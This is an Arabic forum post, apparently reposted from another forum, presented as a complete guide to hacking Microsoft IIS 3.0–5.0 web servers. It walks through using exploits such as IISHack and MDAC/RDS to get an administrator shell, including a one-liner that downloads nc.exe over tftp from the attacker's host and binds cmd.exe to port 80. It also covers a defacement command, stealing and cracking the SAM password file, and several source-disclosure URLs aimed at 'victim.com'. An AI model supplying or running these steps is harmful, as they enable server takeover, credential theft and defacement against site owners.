بسم الله الرحمن الرحيم
" الدليل الكامل لإختراق سيرفر IIS "
<منقول من منتديات شبكة الحزم>
<الكاتب: DEMON >
---------
مقدمة : -
---------
يعلم الجميع مدى انتشار سيرفرات IIS حيث تشكل النسبة الاكبر المستخدمة في تشغيل مواقع الانترنت ..
ويعلم الجميع مدى ضعف الناحية الامنية لهذه السيرفرات .. لذا قررت القيام بجمع اشهر ثغرات هذا النوع مع توضيح كيفية عملها .
---------
ملاحظة : -
---------
معظم الطرق الموجودة هنا تعمل على سيرفرات IIS4.0 و IIS5.0 وجميعها تعتمد على البورت 80 ((يعني من خلال المتصفح)) .
-------------
المتطلبات : -
-------------
1- CGI-Scanner جيد .. أنا افضل Whisker (يمكنك تنزيله من هذا الموقع :
www.wiretrip.net/rfp )
2- اكتيف بيرل لتشغيل ملفات البيرل ( يمكنك تنزيله من الموقع :
http://www.activestate.com/ )
3- ويب سيرفر (اي نوع) اباتشي او IIS ..
#########################
#########################
#########################
###########
#! Game Starts #
###########
----------------
IIS Hack.exe : -
----------------
اكتشف خبراء الامن في شركة eEye ثغرة امنية تسمح لك بتحميل نسخه ذكية من nc.exe وجعلها تنصت على المنفذ 80 ..
وهذا سيعطيك سطر اوامر cmde.exe مع امتيازات Administrator .
بامكانك انزال NC.exe و IIS Hack.exe من الموقع
http://www.technotronic.com/ .
ويجب تشغيل ويب سيرفر في جهازك قبل تنفيذ الثغرة ..
قم بنسخ اداة nc.exe وضعها في الدليل الرئيسي للويب سيرفر لديك (في اباتشي Htdocs) وفي IIS الدليل wwwroot .
ثم قم بتشغيل IISHack.exe :
c:\>iishack.exe
http://www.target.com/ 80 your_IP/ncx.exe
وبعد اتمام الخطوة السابقة بنجاح :
c:\>nc
http://www.target.com/ وستجد امامك eGG SheLL
ملاحظة : تعمل هذه الثغرة على سيرفرات IIS4.0 فقط ((اذا لم يتم تركيب الرقعه)) .
do you want me to explain what to do next, hey common you must be kidding
...hehe....
-----------------
MDAC = RDS :-
-----------------
اعتقد انها ثغرة قديمة قليلا (لكني ما زلت ارى ان 40% من المواقع تعاني منها ..
تسمح لك هذه الثغرة بتشغيل اوامرك على النظام الهدف بشكل محلي .. سيتم تشغيل وامرك بصفتك مستخدم SYSTEM اي بصلاحيات مدير النظام .. على العموم اذا اردت معرفة اذا ما كان النظام مصابا بهذه الثغرة ام لا ..
قم اولا بالاتصال بالنظام الهدف : c:\>nc -nw -w 2
http://www.host.com/ 80 ثم قم بارسال الامر : GET /msadc/msadcs.dll HTTP
فإذا كان الرد : application/x_varg فهذا يعني ان النظام مصاب (( اذا لم يتم ترقيعه )) ..
بامكانك ايجاد سكربتات بيرل تسهل عليك العمل في هذا الموقع :
www.wiretrip.net/rfp (( mdac.pl - msadc2.pl )) v
c:\> mdac.pl -h host.com
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
إذا اردت تغيير الصفحه الرئيسية ما عليك الا تنفيذ الامر : echo hacked by me hehe > C:\inetpub\wwwroot\index.htm
وإذا أردنا احكام السيطرة على الموقع بامكاننا تحميل Hacker's Swiss knife Army اقصد Nc.exe بواسطة هذا الامر :
%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
(( قم بقراءة الامر من اليسار الى اليمين لتتمكن من قراءته جيدا ))
بعدها قم بالاتصال بالنظام الهدف على المنفذ 80 وستجد سطر اوامر مع امتيازات Administrator .
--------------------------------------
Codebrws.asp & Showcode.asp :-
--------------------------------------
الملفان عبارة عن قاريء ملفات ASP يأتي مع IIS ولكنه لا يأتي محمل افتراضيا بل يجب على مدير النظام تفعيله ..
فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تسمح لك بقراءة اي ملف .asp ((اعني رؤية المصدر)) .
باستخدام هذا الامر ستحصل على ملف السام (( اذا كان النظام مصابا )) :
http://www.victim.com/msadc/samples...nt/repair/sam._ بعد الحصول على ملف السام Expand it & Crack it .. باستخدام الاداة المفضلة لدي LC3.0 (سيتم كسرها في اقل من 24 ساعه ) .
--------------
Null.htw : -
------------
عملية شرح كيفية عمل هذه الثغرة معقد قليلا .. لذا سأكتفي فقط بطريقة الاستفادة منها ..
باختصار تسمح لك برؤية السورس كود لاي ملف ASP ..
لتنفيذ الثغرة :
http://www.victim.com/null.htw?CiWe...HiliteType=full سيعرض لك هذا الرابط السورس كود الخاص بالصفحه Default.asp .
----------------------
webhits.dll & .htw : -
----------------------
اولا قم بتجربة اللنك على النظام الهدف :
http://www.victim.com/blabla.htw فإذا كان الرد بهذه العبارة : format of the QUERY_STRING is invalid فهذا يعني ان النظام الهدف مصاب بنسبة 90% .
اخيرا جرب تنفيذ الثغرة بهذه الطريقة :
http://www.victim.com/xxxxxxxxx/xxxx...ilitetype=full مع تغيير الـ XXXXX/XXXXX/XXXX/XXX.htw باحد هذه الملحقات , وبالتأكيد سيعمل احدها :
iissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw
وبالتالي ستحصل على ملف السام قم بكسره بواسطه الاداة LC3 ..
------------------------------------------------
[ASP Alternate Data Streams [::$DATA :-
------------------------------------------------
هذه الثغرة كانت بدايتها منذ العام 1998 .. وهي مخصصة بالتحديد لسيرفرات IIS3.0 والان تعمل على بعض سيرفرات IIS4.0 ..
ومهمتها عرض السورس كود لاي صفحه (( البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ )) الاجابة ان بعض الصفحات تحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل Global.asa
يمكن تنفيذ الثغرة من المتصفح بواسطة هذا الأمر
http://www.victim.com/default.asp::$DATA ------------------
ASP dot bug : -
------------------
ربما اقدم ثغرة في هذا النص هي هذه الثغرة حيث تقوم ايضا بعرض السورس كود الخاص بأي صفحه .. حيث تم اكتشافها في العام 1997 ..
ويتم تنفيذها من المتصفح بهذا الشكل :
.http://www.victim.com/sample.asp لاحظ النقطة الموجودة في اخر السطر
وهي فقط تعمل على سيرفرات IIS3.0 .
------------------------------------
ISM.DLL Buffer Truncation : -
------------------------------------
خطأ برمجي يسمح للمهاجم بسحب الملفات ورؤوية السورس كود ايضا ..
وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا قمنا يطلب ملف ما .. وفي الحقيقة نحن نقوم بطلب ملف اخر ..
الملف المسؤوول عن هذا الخطأ هو ISM.dll حيث يتم تحميله بعدد كبير من الرموز المسافة (%20 ) Space .
يمكن تنفيذ الثغرة بهذا الشكل :
http://www.victim.com/global.asa%20(...<=230)global.asa.htr مكان الـ 230=> نقوم بوضع 230 مسافة بهذا الشكل 20% ..
هذا الخطأ يعمل على سيرفرات IIS 4.0&5.0 .. ولكن لا يمكن تجربتها على السيرفر اكثر من مره الا اذا قام بتسجيل خروج وتسجيل دخول , ويعود السبب في ذلك ان الثغرة السابقة تؤدي الى ايقاف الملف ISM.dll عن العمل في الذاكرة بينما تطلب الثغرة ان يكون الملف المذكور قيد العمل .. لذا يجب اعادة تحميل الملف في الذاكرة مره اخرى .. اي بمعنى اخر يجب ان يقوم مدير النظام الهدف بعمل اعادة تشغيل Rebot او Logout & Login .
----------
+.htr :-
---------
هذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات ASP .
يمكن استخدامها بهذا الشكل :
http://www.victim.com/global.asa+.htr -------------
site.csc : -
------------
تمكنك هذه الثغرة من معرفة معلومات مهمة عن الـ DNS الخاص بالموقع بما في ذلك DSN, UID and PASS Database ..
الثغرة :
http://www.victim.com/adsamples/config/site.csc سيقوم المهاجم بانزال الملف المذكور .. وسيحصل على معلومات قيمة و هامة أيضا .
انتهى،،،
بالتوفيق